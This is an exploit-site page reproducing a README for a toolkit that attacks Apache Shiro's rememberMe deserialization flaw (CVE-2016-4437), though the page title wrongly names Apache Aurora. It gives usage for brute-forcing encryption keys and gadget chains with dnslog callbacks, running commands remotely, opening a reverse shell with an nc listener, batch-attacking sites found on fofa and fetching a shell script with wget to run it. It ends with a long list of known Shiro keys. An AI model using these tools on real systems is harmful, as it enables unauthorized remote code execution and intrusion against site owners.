Sploitus

Exploit for Use of Hard-coded Cryptographic Key in Apache Aurora

githubexploit · 2020-05-27

Exploit Code

README205 lines
## https://sploitus.com/exploit?id=670EC7FD-638A-5C18-84D2-B284D7E7ED35
## Awesome-shiro

CVE-2016-4437 Shiro<=1.2.4 deserialization, tools for blasting modules and keys, code execution, bouncing shells

----

## Reason for vulnerability
Because shiro deserializes the rememberme field in the cookie, if you know how shiro encodes, and then encode the malicious command with its encoding and put it in the cookie in the http header, when shiro deserializes the rememberme field of the submitted cookie, it also executes the The inserted command is then executed, ultimately causing the command to be executed.

shiro uses CookieRememberMeManager by default, and its process for handling cookies is:
`Get the cookie value of rememberMe --> Base64 decoding --> AES decryption --> deserialization`.

## Environment
linux/win10 can be used.
python2/python3 can be used.
Since there is ysoserial.jar under module, the project is a bit big, so bear with me!
## Build the range locally
``
docker pull medicean/vulapps:s_shiro_1
docker run -d -p 80:8080 medicean/vulapps:s_shiro_1
``
## Scripts to use
#### 1. shiro_crack.py Burst Module Usage
Needs to be combined with [http://dnslog.cn/](http://dnslog.cn/)
```
python3 shiro_crack.py http://www.baidu.com/login.do 1695jb.dnslog.
```
View the log after success - the log format is {{key}}. {{module}}.dnslogurl
```
U3ByaW5nQmxhZGUAAAAAAAAA.CommonsBeanutils1.x9zm4v.dnslog.co.uk
```
The successful key is `U3ByaW5nQmxhZGUAAAAAAA==` and the module is `CommonsBeanutils1`.
Because the key contains symbols such as ==/+, this project will escape a little bit. Compare the key in Appendix 1 yourself.
Find one on fofa and play with it
! [1.png](. /img/1.png)
! [2.png](. /img/2.png)
##### shiro_crack.py Principle
In fact, there are a lot of tools to crack modules and keys on the Internet, but after the successful cracking is usually just through, and do not know what the module and key, because for the rce without return, no matter whether it is through or not, the response code is 200.
This project by blasting module and key combined with dnslog indirectly get the successful key and module, the principle that is the connotation of DNSlog, Dns will leave a log when parsing, by reading the parsing logs of multilevel domain names, to get the request information.

### 2, shiro_rce.py rce use
Can be combined with [http://dnslog.cn/](http://dnslog.cn/)
``
python3 shiro_crack.py http://www.baidu.com/login.do "ping rcetest.x9zm4v.dnslog.co.uk"
```
The dnslog looks at `ping rcetest.x9zm4v.dnslog.cn` For differentiation, it is recommended to use a lower level domain name
#### shiro_rce configuration
1. Configure the module
You need to change line 13
``` popen = subprocess.Popen(['java', '-jar', '. /module/ysoserial.jar', 'CommonsBeanutils1', command], stdout=subprocess.PIPE)``` where CommonsBeanutils1 changed to the module used for the blast success
2, configure the key
Line 16 of the

```
key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")
```

Change the key to the one that was successfully blasted
Find one on fofa to play with
! [3.png](. /img/3.png)
! [4.png](. /img/4.png)

### 3. shiro_getshell bounce shell
``
nc -lvnp 7777
python3 shiro_exp.py -u {{target machine for attack}} -lh {{ip for bounce shell}} -lp {{port for bounce shell}}
``
To be on the safe side, it's better to go local.
The principle is to throw the JRMPListener and payload package together, in fact, reasonable can not use jrmplistener

#### shiro_getshell test:
! [6.png](. /img/6.png)
! [5.png](. /img/5.png)

---
A little thought.
Why can't I just use shiro_rec, `bash bounce shell` if I can get out of the net?
I've tried a few times and failed, I think it's because shiro has some kind of filter, but I found that I can wget download a sh script that bounces the shell, and then sh execute it.
Reference [a little research on bouncing shells without jrmplistener](https://st4ck.gitee.io/2020/04/24/apache-shiro-1-2-4-fan-xu-lie-hua-lou-dong-cve-2016-4437-fu-) xian-yu-dao-de-keng/)

---

### 4. fuzz-shiro
Do a simple test based on the request header and response header - drop the sites with shiro into shiro.txt
### 5. shiro_piliang_crack.py
It is recommended to first get the shiro.txt from fuzz-shiro, and then batch hit the
dnsLog records as

{{key}}. {{module}}. {{url}}.dnsurl

It's not bad.

## Frequently Asked Questions
### 1. No module named 'Crypto' appears when running under win10.
Run the following command:
``
pip uninstall crypto pycryptodome
pip install pycryptodome
```
\Lib\site-packages in the python installation directory, change the name of the crypto folder to Crypto.

## Appendix 1, shiro common keys
```
kPH+bIxk5D2deZiIxcaaaA==
4AvVhmFLUs0KTA3Kprsdag==
Z3VucwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
fCq+/xW488hMTCD+cmJ3aQ==
0AvVhmFLUs0KTA3Kprsdag==
1AvVhdsgUs0FSA3SDFAdag==
1QWLxg+NYmxraMoxAXu/Iw==
25BsmdYwjnfcWmnhAciDDg==
2AvVhdsgUs0FSA3SDFAdag==
3AvVhmFLUs0KTA3Kprsdag==
3JvYhmBLUs0ETA5Kprsdag==
r0e3c16IdVkouZgk1TKVMg==
5aaC5qKm5oqA5pyvAAAAAAAA==
5AvVhmFLUs0KTA3Kprsdag==
6AvVhmFLUs0KTA3Kprsdag== 6NfXkC7Y7YY
6NfXkC7YVCV5DASIrEm1Rg== 6ZmI6I2jj
6ZmI6I2j5Y+R5aSn5ZOlAA==
cmVtZW1iZXJNZQAAAAAAAAAAAA==
7AvVhmFLUs0KTA3Kprsdag==
8AvVhmFLUs0KTA3Kprsdag==
8BvVhmFLUs0KTA3Kprsdag=== 8BvVhmFLUs0KTA3Kprsdag
9AvVhmFLUs0KTA3Kprsdag==
OUHYQzxQ/W9e/UjiAGu6rg==
a3dvbmcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
aU1pcmFjbGVpTWlyYWNsZQ==
bWljcm9zAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
bWluZS1hc3NldC1rZXk6QQ==
bXRvbnMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ZUdsaGJuSmxibVI2ZHc9PQ==
wGiHplamyXlVB11UXWol8g==
U3ByaW5nQmxhZGUAAAAAAAAAA==
MTIzNDU2Nzg5MGFiY2RlZg==
L7RioUULEFhRyxM7a2R/Yg==
a2VlcE9uR29pbmdBbmRGaQ==
WcfHGU25gNnTxTlmJMeSpw==
OY//C4rhfwNxCQAQCrQQQ1Q==
5J7bIJIV0LQSN3c9LPitBQ==
f/SY5TIve5WWWzT4aQlABJA==
bya2HkYo57u6fWh5theAWw==
WuB+y2gcHRnY2Lg9+Aqmqg==
kPv59vyqzj00x11LXJZTjJ2UHW48jzHN
3qDVdLawoIr1xFd6ietnwg=== ZWvohmPdUwg
ZWvohmPdUsAWT3=KpPqda
YI1+nBV//m7ELrIyDHm6DQ==
6Zm+6I2j5Y+R5aS+5ZOlAA==
2A2V+RFLUs+eTA3Kpr+dag==
6ZmI6I2j3Y+R1aSn5BOlAA==
SkZpbmFsQmxhZGUAAAAAAAAA==
2cVtiE83c4lIrELJwKGGJUw==
fsHspZw/92PrS3XrPW+vxw==
XTx6CKLo/SdSgub+OPHSrw==
sHdIjUN6tzhl8xZMG3ULCQ==
O4pdf+7e+mZe8NyxMTPJmQ==
HWrBltGvEZc14h9VpMvZWw==
rPNqM6uKFCyaL10AK51UkQ==
Y1JxNSPXVwMkyvES/kJGeQ==
lT2UvDUmQwewm6mMoiw4Ig==
MPdCMZ9urzEA50JDlDYYDg==
xVmmoltfpb8tTceuT5R7Bw==
c+3hFGPjbgzGdrC+MHgoRQ==
ClLk69oNcA3m+s0jIMIkpg==
Bf7MfkNR0axGGGptozrebag==
1tC/xrDYs8ey+sa3emtiYw==
ZmFsYWRvLnh5ei5zaGlybw==
cGhyYWNrY3RmREUhfiMkZA==
IduElDUpDDXE677ZkhhKnQ==
yeAAo1E8BOeAYfBlm4NG9Q==
cGljYXMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2itfW92XazYRi5ltW0M2yA==
XgGkgqGqYrix9lI6vxcrRw==
ertVhmFLUs0KTA3Kprsdag==
5AvVhmFLUs0ATA4Kprsdag==
s0KTA3mFLUprK4AvVhsdag==
hBlzKg78ajaZuTE0VLzDDg==
9FvVhtFLUs0KnA3Kprsdyg==
d2ViUmVtZW1iZXJNZUtleQ==
yNeUgSzL/CfiWw1GALg6Ag==
NGk/3cQ6F5/UNPRh8LpMIg==
4BvVhmFLUs0KTA3Kprsdag==
MzVeSkYyWTI2OFVLZjRzZg==
CrownKey==a12d/dakdad
empodDEyMwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
A7UzJgh1+EWj5oBFi+mSgw==
YTM0NZomIzI2OTsmIzM0NTueYQ==
c2hpcm9fYmF0aXMzMgAAAAAA==
i45FVt72K2kLgvFrJtoZRw==
U3BAbW5nQmxhZGUAAAAAAAAAA==
ZnJlc2h6Y24xMjM0NTY3OA==
Jt3C93kMR9D5e8QzwfsiMw==
MTIzNDU2NzgxMjM0NTY3OA==
vXP33AonIp9bFwGl7aT7rA==
V2hhdCBUaGUgSGVsbAAAAA=== Z3h6eWd4
Z3h6eWd4enklMjElMjElMjE=
Q01TX0JGTFlLRVlfMjAxOQ==
ZAvph3dsQs0FSL3SDFAdag==
Is9zJ3pzNh2cgTHB4ua3+Q==
NsZXjXVklWPZwOfkvk6kUA==
GAevYnznvgNCURavBhCr1w==
66v1O8keKNV3TTcGPK1wzg==
SDKOLKn2J1j/2BHjeZwAoQ==
``